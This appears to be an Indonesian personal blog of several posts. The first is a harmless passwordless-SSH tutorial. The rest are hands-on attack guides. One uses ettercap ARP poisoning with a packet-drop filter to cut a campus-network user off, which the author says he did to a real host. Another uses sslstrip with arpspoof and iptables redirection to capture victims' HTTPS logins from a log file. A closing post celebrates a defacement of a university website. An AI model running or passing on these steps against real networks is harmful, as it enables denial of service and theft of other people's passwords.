kemaren mau debmirror repo ubuntu 10.10 maverick ke http://tawon.amikom.ac.id/. mau login tapi passwordnya dah diganti sama si cacad vei (doh) mau nanyain anaknya masih tidur *baru tidur maksudnya* habis begadang seharian… hohohoho…. akhirnya datanglah sang pahlawan si adi nugroho… hahaha.. dengan pedenya mengatakan “bisa kok login tanpa password…” bagaimana caranya?? ya dengan ssh-keygen.. tapi sayang beribu sayang,, teori dia dipatahkan dengan pertanyaan “kan harus login dulu.. passwordnya mana?” ckckckc…

akhirnya datang lagi sang pahlawan kita…. syafii ternyata dari tadi diem bocah ini tau passwordnya.. asseennggg… akhirnya mulailah prakteknya.. jadi intinya.. dalam komputer kita *dengan catatan komputer pribadi agar yang lain gak bisa login.. n sistem operasinya pastiin linux yaa… *. dalam komputer kita hanya ssh aja.. gak perlu masukin password lagi… selamanya.. walaupun diserver passwordnya dah diganti… *dengan catatan usernya gak dihapus.. hehehe*. ok langsung aja ikuti langkahnya..

1. Pertama kita buat public dan private keys di localhost

dhymaz@dhymaz-akiyama:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/dhymaz/.ssh/id_rsa): [tekan enter]
Created directory ‘/home/dhymaz/.ssh’.
Enter passphrase (empty for no passphrase): [tekan enter]
Enter same passphrase again: [tekan enter]
Your identification has been saved in /home/dhymaz/.ssh/id_rsa.
Your public key has been saved in /home/dhymaz/.ssh/id_rsa.pub.
The key fingerprint is:
cd:eb:48:fd:a6:42:f8:b6:10:03:28:a2:a1:30:41:80 dhymaz@dhymaz-akiyama
The key’s randomart image is:
+–[ RSA 2048]—-+
|*. |
|E. . |
|* . . |
|=+ . o |
|o o.S o |
| .o.. . |
| .o. o |
| o+o .. |
| .oooo. |
+—————–+

2. Copy public key yang telah dibuat ke remotehost dengan ssh-copy-id

dhymaz@dhymaz-akiyama:~$ ssh-copy-id -i ~/.ssh/id_rsa.pub dhymaz@dhymazspyro.com
dhymaz@dhymazspyro.com’s password:
Now try logging into the machine, with “ssh ‘dhymaz@dhymazspyro.com’”, and check in:

.ssh/authorized_keys
to make sure we haven’t added extra keys that you weren’t expecting

.nah kalo gitu sudah terupload keserver…
3. Coba login ke remotehost atau shell anda

dhymaz@dhymaz-akiyama:~$ ssh dhymaz@dhymazspyro.com
WellCome Dhymaz
Last login: Thu Oct 14 09:39:13 2010 from 172.16.32.2

[dhymaz@dhymazspyro.com ~]$

tadaaa….. login tanpa password kan?
hehehe… nah sekarang belum selesai… coba pikir bagaimana jika ada 2 id yang mau dimasukkan.. dalam artian ada 2 komputer.. nah loh… ternyata caranya gampang…. generate id kompuernya… seperti pada langkah 1…
kemudian buka file ~/.ssh/id_rsa.pub
isinya,, copykan ke server dalam file ~/.ssh/authorized_keys
buat baris baru dan pastekan dibaris bawahnya… gitu aja kok.. ^_^

akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe. lama kelamaan makin menjadi-jadi setelah keterangan dari wireshark menayangkan error yang sangat banyak, keterangan errornya adalah duplicate IP yang random. setiap hostname tersebut OL, pasti jaringan kacau. hostnamenya adalah “NUMPANK-OM”. ternyata komputer tersebut kena virus yang bikin kacau jaringan. inisiatif gw bagi tugas dengan temen gw aji. hehe, kayak FBI aja. dia ngecut koneksi dari IP yang bermasalah tersebut dan ngeflood balik. mau gak mau harus seperti itu, kalo nggak ya semua client pada kacau. tapi tetep gak kapok n kayaknya semua yang pake windus mulai terinfeksi.. (doh) payah ni sistem operasi satu nih. ya udah, gw coba cara yang menurut gw ampuh ini.. hehe. yaitu dengan metode ARP POISONING. gak usah dijelasin, langsung praktek aja yah. implementasinya begini :

(disarankan untuk memakai LINUX)
1. install ettercap
2. jalankan ettercap
3. pilih sniff -> unnified sniffing -> dan pilih interface yang terkoneksi tersebut.

Listening on eth1… (Ethernet)

eth1 -> 00:16:E6:DC:F1:DB 172.16.30.7 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

4. kemudian pilih host -> scan for host (tunggu sampai scanning selesai.

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
30 hosts added to the hosts list…

5. kemudian pilih host -> host list
disitu ada list ip client yang sedang OL, contohnya salah satunya : 172.16.30.6 <- ini adalah IP victim yang akan kita putuskan koneksinya. klik di IP tersebut dan klik "add to target 1"

Host 172.16.30.6 added to TARGET1

6. kemudian buat file (terserah mau pake kate,gedit,atai apapun editor kesenangan anda) dan masukkan script ini :

if (ip.src == ’172.16.30.6′ || ip.dst == ’172.16.30.6′) {
drop();
kill();
msg(“Packet Dropped\n”);
}

nb : ip 172.16.30.6 disesuaikan dengan IP target anda
fite tersebut save ke dalam bentuk *.eft – ex: target.eft

7. convert file tersebut ke target.ef dan copy ke /usr/share/ettercap/
spyro@dhymaz-chua:~$ sudo etterfilter target.eft -o target.ef
spyro@dhymaz-chua:~$ sudo cp target.ef /usr/share/ettercap/

8. kembali ke ettercap, kemudiam pilih mitm -> arp poisoning -> centang “sniff remote connection” dan klik ok.

ARP poisoning victims:

GROUP 1 : 172.16.30.6 00:14:85:2D:50:3B

GROUP 2 : ANY (all the hosts in the list)

9. klik filters -> load a filter dan pilih file target.ef tadi yang telah dibuat.

GROUP 2 : ANY (all the hosts in the list)
Content filters loaded from /usr/share/ettercap/sekber.ef…

10. dan saya telah memastikannya, ngeping ke server lancar, ngeping ke internet lancar, ngeping ke ip victim lancar, tapi victim tidak akan bisa konek ke internet.

begitulah kurang lebih penjelasannya. selamat mencoba… (target yang saya serang dalam membuat artikelini menggunakan windows).
ettercap juga bisa dipakai untuk mematikan gateway. wow seremm.. haha.. masih banyak lagi yang bisa dilakukan oleh ettercap.. pinter2 explorasi aja yaa ^_^

regards : dhymaz_spyro

see this..

see this…

setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa lumayan menurutku untuk menghack protocol https alias ssl hijacking. keterangannya silahkan baca disini atau disini dan juga disini dan masih banyak lagi…

nge-bacrit selesai.. langsung ke TKP :

1. semisal aja,
attacker : 172.192.30.30
victim : 172.192.30.40
gateway : 172.192.30.254

information : artikel ini menggunakan sistem operasi linux

2. command : sslstrip
manual options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message

3 . execute :
root@spyro:~# sslstrip -a -w logfilename

4. execute arpspoof of the victim :
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254

5. activate a ip_forward function :
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward

6. redirect http port victim communication to sslstrip port
root@spyro:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

nah, ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya “logfilename”)

7. view a dump log file :
root@spyro:~# cat logfilename | grep -i “passwd=”

lihat dan cari kata kunci “login=” dan “passwd=”
ex : login=dhymaz_spyro&passwd=djancuukkk

thankz to laharisi

untuk kedua kalinya pada pukul 15.10 http://amikom.ac.id dihack kembali by anaktk. lagi lagi buat pembelajaran ajalah buat amikom.. :p

sekolah tinggi sekelas amikom berhasil dihack… semoga ini menjadi pelajaran.. xixixixixixixi ^_^